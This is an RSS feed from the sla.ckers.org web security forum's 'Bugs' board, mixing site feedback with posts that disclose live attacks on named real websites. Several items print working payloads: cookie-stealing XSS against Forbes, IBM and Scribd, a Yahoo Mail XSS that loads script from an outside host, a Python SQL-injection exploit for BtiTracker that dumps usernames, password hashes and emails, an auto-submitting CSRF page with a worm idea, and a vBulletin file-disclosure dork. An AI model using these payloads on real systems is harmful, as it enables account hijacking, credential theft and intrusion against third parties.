<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Web Application Security Forum - Bugs</title>
        <description>Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please.</description>
        <link>http://sla.ckers.org/forum/list.php?10</link>
        <lastBuildDate>Tue, 18 Jun 2013 19:46:48 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,42175,42175#msg-42175</guid>
            <title>forbes [XSS] (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,42175,42175#msg-42175</link>
            <description><![CDATA[http://search.forbes.com/search/colArchiveSearch?author=&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;]]></description>
            <dc:creator>longrifle0x</dc:creator>
            <category>Bugs</category>
            <pubDate>Sun, 15 Jan 2012 11:02:07 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,36042,36042#msg-36042</guid>
            <title>&quot;Phishing&quot; with Google.com - creating realistic fake webpages (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,36042,36042#msg-36042</link>
            <description><![CDATA[&quot;Phishing&quot; with Google.com - creating realistic fake webpages<br />
<br />
More here: <a href="http://tinkode27.baywords.com/phishing-with-google/" rel="nofollow" >http://tinkode27.baywords.com/phishing-with-google/</a><br />
<br />
Authors: TinKode &amp; Lady Sony@ISR]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Mon, 14 Mar 2011 18:21:51 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,35733,35733#msg-35733</guid>
            <title>Bugs in the current version of sla.ckers.org (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,35733,35733#msg-35733</link>
            <description><![CDATA[Hey guys, the settings should be identical from the last install we had, so theoretically there should be no new bugs, but I know at least one existed (Thanks to Gareth Heyes for pointing it out).  I disabled smilies and auto-linking which appears to have fixed that problem and coincidentally makes the board less annoying, so it's a win win.  Let me know if you guys see any other issues pop up.]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 19 Jan 2011 13:14:55 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,34676,34676#msg-34676</guid>
            <title>BtiTracker 1.3.x – 1.4.x Exploit [Python] (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,34676,34676#msg-34676</link>
            <description><![CDATA[BtiTracker 1.3.x – 1.4.x Exploit<br />
<br />
<br />
<img src="http://img819.imageshack.us/img819/1866/shit.png" class="bbcode" border="0" /><br />
<br />
<br />
<pre class="bbcode">#!/usr/bin/env python# 
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/&gt; \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  
 
import sys, urllib2, re
  
if len(sys.argv) &lt; 2:
    print &quot;===============================================================&quot;
    print &quot;============== BtiTracker 1.3.X - 1.4.X Exploit  ===============&quot;
    print &quot;===============================================================&quot;
    print &quot;=               Discovered and coded by  TinKode               =&quot;     
    print &quot;=                      www.InSecurity.ro                       =&quot;
    print &quot;=                                                              =&quot;
    print &quot;= Local  Command:                                              =&quot;
    print &quot;= ./isr.py [http://webshit]  [ID]                              =&quot;
    print &quot;=                                                              =&quot;
    print &quot;===============================================================&quot;
    exit()
  
if len(sys.argv) &lt; 3:
    id = 1
else:
    id = sys.argv[2]
  
shit  = sys.argv[1]
if shit[-1:] != &quot;/&quot;:
    shit += &quot;/&quot;
  
url  = shit  + &quot;reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=&quot; + str(id) +  &quot;--&quot;
print &quot;\n&quot;
print &quot;=============================================&quot;
print &quot;=================  InSecurity ================&quot;
print &quot;=============================================&quot;
  
html  = urllib2.urlopen(url).read()
slobod =  re.findall(r&quot;--(.*)\:([0-9a-fA-F]{32})\:(.*)--&quot;, html)
if  len(slobod)  &gt; 0:
    print &quot;ID       : &quot;  + str(id)
    print &quot;Username : &quot; +  slobod[0][0]
    print &quot;Password : &quot; +  slobod[0][1]
    print &quot;EMail    : &quot; +  slobod[0][2] 
    print &quot;=============================================&quot;
    print &quot;================= InSecurity ================&quot;
    print &quot;=============================================&quot;
else:
    print &quot;Ai luat-o la gaoaza...&quot;
     
#InSecurity.ro - Romania</pre>]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 09 Jun 2010 19:37:49 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,34635,34635#msg-34635</guid>
            <title>Shelling vBulletin All Versions (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?10,34635,34635#msg-34635</link>
            <description><![CDATA[Read here: http://blog.insecurity.ro/shelling-vbulletin-4-0-x-3-8-x-xml/<br />
<br />
XML Shell Download: http://www.teamwork.insecurity.ro/xfiles/Shell-vBulletin-.xml.ISR<br />
<br />
Thanks, TinKode @ insecurity.ro]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Tue, 10 Aug 2010 22:54:50 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,34465,34465#msg-34465</guid>
            <title>xss &amp; dt &amp; frameinj @ ibm (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,34465,34465#msg-34465</link>
            <description><![CDATA[hi everybody,<br />
i have found bugs @ ibm aix compiler help pages..<br />
<br />
1) frame injection : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=http://www.google.com<br />
<br />
2) xss : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=../%27%3E%3Cframe%20onLoad=%27alert%28document.cookie%29<br />
<br />
3) directory traversal : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=/../index.jsp<br />
<br />
the content.jsp file have this issues.. <br />
<br />
best regards, hc0de]]></description>
            <dc:creator>hc0de</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 12 May 2010 14:53:46 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33945,33945#msg-33945</guid>
            <title>xss in   XX@mail.ru (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33945,33945#msg-33945</link>
            <description><![CDATA[&lt;STYLE&gt; #mybody {height:rgb('20',20,'220);/**/height:rgb(')=<br />
 !important height:EXPRESSION( (alert(xss)));}=<br />
   &lt;/STYLE&gt;]]></description>
            <dc:creator>skruskru</dc:creator>
            <category>Bugs</category>
            <pubDate>Sun, 18 Apr 2010 03:55:01 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33930,33930#msg-33930</guid>
            <title>ESET NOD32 Taiwan SQLi (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33930,33930#msg-33930</link>
            <description><![CDATA[More here: http://insecurity.baywords.com/index.php/eset-nod32-taiwan-full-disclosure/]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Tue, 22 Nov 2011 17:09:09 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33926,33926#msg-33926</guid>
            <title>ESET NOD32 Hong Kong (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33926,33926#msg-33926</link>
            <description><![CDATA[<img src="http://img221.imageshack.us/img221/1511/esethk.png" class="bbcode" border="0" /><br />
<br />
More here: http://insecurity.baywords.com/index.php/eset-nod32-hong-kong-hacked/]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Sun, 21 Mar 2010 07:08:53 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33720,33720#msg-33720</guid>
            <title>IBM Full Disclosure [Hacked] (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33720,33720#msg-33720</link>
            <description><![CDATA[More here:<br />
http://insecurity.baywords.com/index.php/ibm-full-disclosure-sql-injection/]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Tue, 08 Nov 2011 19:20:10 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33700,33700#msg-33700</guid>
            <title>xss in r00tsecurity.org (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33700,33700#msg-33700</link>
            <description><![CDATA[interesting :D<br />
www.r00tsecurity.org  	XSS  	2010-02-14<br />
<br />
verification link:<br />
http://bugtraq.co.cc/410.bug<br />
http://bugtraq.co.cc/log.php?id=410]]></description>
            <dc:creator>diamond</dc:creator>
            <category>Bugs</category>
            <pubDate>Thu, 04 Mar 2010 01:04:27 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33529,33529#msg-33529</guid>
            <title>a new yahoo mail xss (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33529,33529#msg-33529</link>
            <description><![CDATA[&lt;div id=&quot;xxx&quot; style=&quot;DISPLAY: none&quot; title=&quot;try{window['on'+'error']=function(){return true;};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}&quot;&gt;.&lt;/div&gt;&lt;div style=&quot;DISPLAY: none&quot;&gt;&lt;img lang=&quot;HTML&quot; id=&quot;inner&quot; title=&quot;&lt;img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#&gt;&quot; width=0 src=&quot;http://#&quot; style=&quot;background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.title;//)`&quot;&gt;&lt;/div&gt;<br />
<br />
I got it from my yahoo inbox.]]></description>
            <dc:creator>yahooxss2</dc:creator>
            <category>Bugs</category>
            <pubDate>Fri, 19 Feb 2010 17:28:57 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33495,33495#msg-33495</guid>
            <title>CNN Oracle SQL Injection (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33495,33495#msg-33495</link>
            <description><![CDATA[CNN Oracle SQL Injection<br />
<br />
http://isrteam.wordpress.com/2010/02/17/cnn-vulnerable-to-sql-injection/]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 17 Feb 2010 15:41:52 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33154,33154#msg-33154</guid>
            <title>N.A.S.A Again? (5 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33154,33154#msg-33154</link>
            <description><![CDATA[http://bit.ly/6VpyNE]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 07 Dec 2011 14:17:17 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,33108,33108#msg-33108</guid>
            <title>vBulletin nulled (validator.php) files/directories disclosure (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,33108,33108#msg-33108</link>
            <description><![CDATA[<pre class="bbcode">*\-----------------------------------------------------------------------------/* 
		       ____        _ _      _   _       (nulled) 
		      |  _ \      | | |    | | (_) 
		__   _| |_) |_   _| | | ___| |_ _ _ __ 
		\ \ / /  _ &lt;| | | | | |/ _ \ __| | '_ \ 
		 \ V /| |_) | |_| | | |  __/ |_| | | | | 
		  \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| 
		                  Full disclosure... 
 
*\-----------------------------------------------------------------------------/*</pre>
 <br />
Name: vBulletin nulled (validator.php) files/directories disclosure <br />
Author: TinKode <br />
Date: 19-01-2010 <br />
Dork: &quot;inurl:validator.php&quot; <br />
 <br />
*\-----------------------------------------------------------------------------/* <br />
 <br />
Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin i <br />
nstalled... <br />
 <br />
*\-----------------------------------------------------------------------------/* <br />
 <br />
Exploit: http://www.website.com/vB_forum/validator.php <br />
 <br />
*\-----------------------------------------------------------------------------/* <br />
 <br />
Note: Work on many nulled versions (maybe all) <br />
 <br />
*\-----------------------------------------------------------------------------/* <br />
 <br />
Copyrights: http://tinkode.baywords.com <br />
 <br />
*\-----------------------------------------------------------------------------/* <br />
 <br />
Greetz: http://www.insecurity.ro, http://www.darkc0de.com <br />
 <br />
*\-----------------------------------------------------------------------------/*]]></description>
            <dc:creator>TinKode</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 20 Jan 2010 07:31:21 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,32878,32878#msg-32878</guid>
            <title>sla.ckers feature request: entries by time (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,32878,32878#msg-32878</link>
            <description><![CDATA[I ususally check out the rss feed-page to see what is new, and browse through it all to see what is interesting. So far so good. But couldn't you guys put together a page with similar functionality of displaying everything recent that also : <br />
- Shows the names of the authors<br />
- Marks the entries as read<br />
- Can be navigated to see even older messages than just the last X messages]]></description>
            <dc:creator>holiman</dc:creator>
            <category>Bugs</category>
            <pubDate>Fri, 01 Jan 2010 05:58:44 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,31753,31753#msg-31753</guid>
            <title>Bug on HDFC Bank has been patched!! (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,31753,31753#msg-31753</link>
            <description><![CDATA[Hi Guys,<br />
<br />
I have found information leakage on HDFC Bank!!<br />
<br />
Here is the link!<br />
<br />
http://www.hdfcbank.com/nri/access/instaquery/insta.asp?reg=Dominican%27]]></description>
            <dc:creator>brightpixel</dc:creator>
            <category>Bugs</category>
            <pubDate>Tue, 06 Oct 2009 23:52:44 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,31530,31530#msg-31530</guid>
            <title>MULTIPLE VULNERABILITY(xss,csrf,worm) on www.scribd.com (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,31530,31530#msg-31530</link>
            <description><![CDATA[The site http://www.srcibd.com, a network community(che Obama ha usato per la sua campagna elettorale) it's a big community that fight with amazon.com for the 1° most visited site at world. (now scribd have 55 milion of visit evry month)<br />
<br />
It's vulnerable to xss, permanent xss, js injection and CSRF<br />
(all DISCOVERED BY ME)<br />
<br />
#### XSS:<br />
<pre class="bbcode">
http://www.scribd.com/my_docs?query=//%3Cfont%20color=%22red%22%3EXADOS%20WAS%20HERE%3C/font%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20By%20XaDoS%3Ch1%3E%3C/marquee%3E%3Cscript%20src=%22http://www.googlebig.com/x.js%22%3E%3C/script%3E</pre>
<br />
### Permanent XSS:<br />
<br />
(after login)<br />
at page http://www.scribd.com/alerts a user can write a new alert, but with malicious js code like:<br />
<pre class="bbcode">
Name of alert: &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
text of alert: &quot;&gt;&lt;script&gt;alert(2)&lt;/script&gt;</pre>
<br />
and so post request are like..<br />
Code:<br />
<pre class="bbcode">
&lt;input id=&quot;alert_name&quot; name=&quot;alert[name]&quot; size=&quot;30&quot; style=&quot;width: 500px;&quot; value=&quot;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&quot; type=&quot;text&quot;&gt;

&lt;textarea cols=&quot;40&quot; id=&quot;alert_alert_text&quot; name=&quot;alert[alert_text]&quot; rows=&quot;20&quot; style=&quot;width: 500px; height: 80px;&quot;&gt;&quot;&amp;gt;&amp;lt;script&amp;gt;alert(2)&amp;lt;/script&amp;gt;&lt;/textarea&gt;</pre>
<br />
<br />
and there are no token or captcha, so an attaker can write a csrf code like this( working!):<br />
Code:<br />
<pre class="bbcode">
&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;
&lt;head&gt;
&lt;title&gt;scribd csrf exploit&lt;/title&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/HTML; charset=UTF-8&quot; /&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form name=&quot;xados&quot; action=&quot;http://www.scribd.com/alerts&quot; class=&quot;new_alert&quot; id=&quot;new_alert&quot; method=&quot;post&quot;&gt;
    &lt;input id=&quot;alert_word_user_id&quot; name=&quot;alert[word_user_id]&quot; type=&quot;hidden&quot; value=&quot;[ID-VICTIM]&quot; /&gt;
        &lt;input id=&quot;alert_name&quot; name=&quot;alert[name]&quot; size=&quot;30&quot; style=&quot;width: 500px;&quot; type=&quot;text&quot; value=&quot;[TITLE]&quot; /&gt;
    &lt;textarea cols=&quot;40&quot; id=&quot;alert_alert_text&quot; name=&quot;alert[alert_text]&quot; rows=&quot;20&quot; style=&quot;width: 500px; height: 80px;&quot;&gt;[MESSAGE]&lt;/textarea&gt;
        &lt;input checked=&quot;checked&quot; id=&quot;alert_matchmode_2&quot; name=&quot;alert[matchmode]&quot; type=&quot;radio&quot; value=&quot;2&quot; /&gt;
    &lt;input id=&quot;alert_matchmode_1&quot; name=&quot;alert[matchmode]&quot; type=&quot;radio&quot; value=&quot;1&quot; /&gt;
    &lt;input name=&quot;commit&quot; type=&quot;submit&quot; value=&quot;submit&quot; /&gt;
&lt;/form&gt;
&lt;script&gt;document.xados.submit()&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
<br />
and trought this csrf can create an xss worm that self<br />
reply trought alerts xss permanet vuln.<br />
<br />
have fun.<br />
0-day by XaDoS]]></description>
            <dc:creator>XaDoS</dc:creator>
            <category>Bugs</category>
            <pubDate>Fri, 18 Sep 2009 15:57:37 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,31323,31323#msg-31323</guid>
            <title>possible bug (6 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,31323,31323#msg-31323</link>
            <description><![CDATA[It appears to be possible to log in as another user without going through the username/password crap by getting the url 'phorum_session_v5=blablabla' bit correct. I noticed this because I bookmarked a page and it auto-logged me in when I returned to it the next day even though I have a different IP and cookies disabled. Actually I guess it might be a side effect of having cookies disabled. I would have thought the session should have expired or something. Probably not actually a bug or fixworthy but I thought I'd mention it.]]></description>
            <dc:creator>Albino</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 03 Mar 2010 19:46:28 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,30086,30086#msg-30086</guid>
            <title>a new yahoo mail xss,be patched. (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,30086,30086#msg-30086</link>
            <description><![CDATA[&lt;div id=&quot;logo&quot;&gt;cosine&lt;/div&gt;<br />
&lt;div id=&quot;love&quot; title=&quot;&lt;div style=top:expression(alert(111))&gt;&lt;/div&gt;&quot; style=&quot;DISPLAY:none;&quot;&gt;&lt;/div&gt;<br />
...<br />
&lt;/div&gt;]]></description>
            <dc:creator>yahooxss</dc:creator>
            <category>Bugs</category>
            <pubDate>Wed, 02 Sep 2009 12:09:06 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,29342,29342#msg-29342</guid>
            <title>intresting FF bug. (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?10,29342,29342#msg-29342</link>
            <description><![CDATA[there has been found an intresting bug concerning FF i'm not sure if it has already been patched but i doubt it<br />
<br />
unicode-overflow<br />
<br />
http://packetstormsecurity.org/0907-exploits/firefox35unicode-overflow.txt]]></description>
            <dc:creator>SpoofGhost</dc:creator>
            <category>Bugs</category>
            <pubDate>Tue, 05 Jan 2010 19:13:14 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,29204,29204#msg-29204</guid>
            <title>Find the Bug: A Book of Incorrect Programs (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,29204,29204#msg-29204</link>
            <description><![CDATA[50 exercises to help you find bugs faster -- with less aggravation! <br />
<br />
<a href="http://www.infibeam.com/Books/info/Adam-Barr/Find-the-Bug-A-Book-of-Incorrect/0321223918.html" rel="nofollow" >Find the Bug: A Book of Incorrect Programs</a>: Bug hunting is&quot; &quot;an art, and you need to be a &quot;master,&quot; Get &quot;Find the Bug,&quot; and you' ll become one. Long-time Microsoft programmer Adam Barr presents 50 programs, each with exactly one bug. Your assignment: &quot;find it.&quot; As you do, Barr will teach you how to &quot; think like your processor&quot; ... anticipating exactly how code will behave, even without running it. You' ll learn better ways to read code, understand it -- and above all, &quot;improve&quot; it.<br />
<br />
<img src="http://img.infibeam.com/img/493bde72/913/3/9780321223913.jpg" class="bbcode" border="0" /><br />
<br />
<a href="http://www.infibeam.com/Books/info/Adam-Barr/Find-the-Bug-A-Book-of-Incorrect/0321223918.html" rel="nofollow" >Read More...</a>]]></description>
            <dc:creator>godzila</dc:creator>
            <category>Bugs</category>
            <pubDate>Thu, 09 Jul 2009 08:44:00 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,27864,27864#msg-27864</guid>
            <title>Forum CSS to stop stretching (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,27864,27864#msg-27864</link>
            <description><![CDATA[I was wondering if anyone else uses a large monitor over 1280 or 1440? Because the eye is only designed to read at max 20 words before there should be some kind of wrapping so that the lines of text don't keep going, and going.<br />
<br />
Here is an example that would keep this forum from just stretching the text on forever across the screen. 900px or so is generally what is used as the max width of a text area.<br />
<br />
.PDDiv { max-width: 900px;}<br />
.StdBlock {padding: 15px;}<br />
<br />
Now, I don't assume to know how you guys want your forum setup or styled. But I though I would mention this as reading small 11px font that just keeps stretching across the screen is kind of an eye strain if you have a lot to read.]]></description>
            <dc:creator>Xeoncross</dc:creator>
            <category>Bugs</category>
            <pubDate>Mon, 27 Apr 2009 11:29:36 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,26774,26774#msg-26774</guid>
            <title>FYI: This area is for bugs with _this_ site (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,26774,26774#msg-26774</link>
            <description><![CDATA[There's other areas that would be more appropriate for bugs in other sites.]]></description>
            <dc:creator>tx</dc:creator>
            <category>Bugs</category>
            <pubDate>Sat, 28 Feb 2009 09:46:18 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,26758,26758#msg-26758</guid>
            <title>googles coop/cse endless loop (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,26758,26758#msg-26758</link>
            <description><![CDATA[wasn't logged in with the google account and hit the 'manage your existing search engine' link... and found an endless loop...<br />
<br />
https://www.google.com/accounts/ServiceLogin?continue=http://www.google.com/coop/manage/cse/&amp;service=cprose&amp;hl=en&amp;passive=true<br />
<br />
I wonder why didn't Firefox stop it... (does it happen to others too?)<br />
<br />
*update* - it does this even when logged :|<br />
**update** - now everything's back to normal]]></description>
            <dc:creator>backbone</dc:creator>
            <category>Bugs</category>
            <pubDate>Thu, 26 Feb 2009 02:17:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,26638,26638#msg-26638</guid>
            <title>Unauthorized TinyURL URL Enumeration Vulnerability (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,26638,26638#msg-26638</link>
            <description><![CDATA[Some thoughts on TinyURL - http://securethoughts.com/2009/02/unauthorized-tinyurl-url-enumeration-vulnerability/]]></description>
            <dc:creator>Inferno</dc:creator>
            <category>Bugs</category>
            <pubDate>Fri, 20 Feb 2009 20:16:07 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,26464,26464#msg-26464</guid>
            <title>Breaking Stealth Myth of Desktop Locking Softwares (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,26464,26464#msg-26464</link>
            <description><![CDATA[This article at my blog might be interesting to some folks, especially ones that use desktop locking softwares such as folder guard, lock folder xp, etc.<br />
<br />
http://www.securethoughts.com/2009/02/breaking-the-stealth-myth-of-desktop-locking-softwares/]]></description>
            <dc:creator>Inferno</dc:creator>
            <category>Bugs</category>
            <pubDate>Thu, 05 Feb 2009 01:58:44 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,26398,26398#msg-26398</guid>
            <title>Drupal, is it a real problem? (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?10,26398,26398#msg-26398</link>
            <description><![CDATA[hi everyone,<br />
<br />
yesterday, when i was playiing around some friends website using drupal i've notice the following.<br />
drupal have two options for mapping URL, the first uses the &quot;?q=&quot; in the querystring and the other just append &quot;node&quot; or the page name after the website adress directly.<br />
<br />
in the second case iif we type for example http:// drupalsiteexample/someword, the webste will respond that the page doesn't exist and it will show the search page filled with &quot;someword&quot;.<br />
<br />
but it doesn't end here, it also maps the action of the search form to domething like this action=&quot;/someword&quot;<br />
<br />
so consider the following url http:// drupalsiteexample/http:// google.com, then the site will claim that google.com doesnt exist but it'll map the action of the search page to http:// google.com. (I tried it and it works).<br />
<br />
what if we design a page that looks like a drupal admin page and then added its adress to drupal's URL and instructs sommeone (the admin evidently) to perform a serach...<br />
<br />
well am not sure exactly how to implement such an attack, but do u think that such an attack is possible? and if yes, what kind of attack is that? and finally anyone can provide a complete senario of such attacks!!!<br />
<br />
thanx very much all.]]></description>
            <dc:creator>dotnet_1</dc:creator>
            <category>Bugs</category>
            <pubDate>Fri, 18 Dec 2009 09:57:38 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,23907,23907#msg-23907</guid>
            <title>Any alternative to load function of XML DOM. (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,23907,23907#msg-23907</link>
            <description><![CDATA[Hi all, <br />
I am stuck with a problem related to XML DOM . I was trying to parse the RSS feed given by BBC and display the feeds in my webpage thats running on localhost .<br />
This is the code snippet<br />
<br />
    var xmlDoc=null;<br />
    if (window.ActiveXObject)<br />
    {// code for IE<br />
    xmlDoc=new ActiveXObject(&quot;Microsoft.XMLDOM&quot;);<br />
    }<br />
    else if (document.implementation.createDocument)<br />
    {// code for Mozilla, Firefox, Opera, etc.<br />
    xmlDoc=document.implementation.createDocument(&quot;&quot;,&quot;&quot;,null);<br />
    }<br />
    else<br />
    {<br />
    alert('Your browser cannot handle this script');<br />
    }<br />
<br />
    if (xmlDoc!=null)<br />
    {<br />
      xmlDoc.async=false;<br />
      xmlDoc.load(&quot;http://en-US.fxfeeds.mozilla.com/en-US/firefox/headlines.xml&quot;);<br />
     <br />
     }<br />
<br />
On doing so I get an error in firebug as &quot;uncaught exception: Permission denied to call method XMLDocument.load&quot; .<br />
I also understand that  load() has restrictions  that the file that you want to load and the program thats loading it must be on the same server . I want to know  is there any alternative to load() that I can use to get things running .<br />
<br />
Shivkumar Lal]]></description>
            <dc:creator>shivkumarlal</dc:creator>
            <category>Bugs</category>
            <pubDate>Tue, 03 Feb 2009 11:22:35 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?10,23761,23761#msg-23761</guid>
            <title>blocked from ha.ckers.org (10 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?10,23761,23761#msg-23761</link>
            <description><![CDATA[hey everyone<br />
<br />
I can no longer access ha.ckers.org without proxying. No idea why, my best guess is because lots of people from my ISP show the same ip address it got blocked.<br />
<br />
Could you please look into it?<br />
<br />
Thanks<br />
<br />
ace]]></description>
            <dc:creator>ace</dc:creator>
            <category>Bugs</category>
            <pubDate>Mon, 04 Aug 2008 00:12:43 -0500</pubDate>
        </item>
    </channel>
</rss>
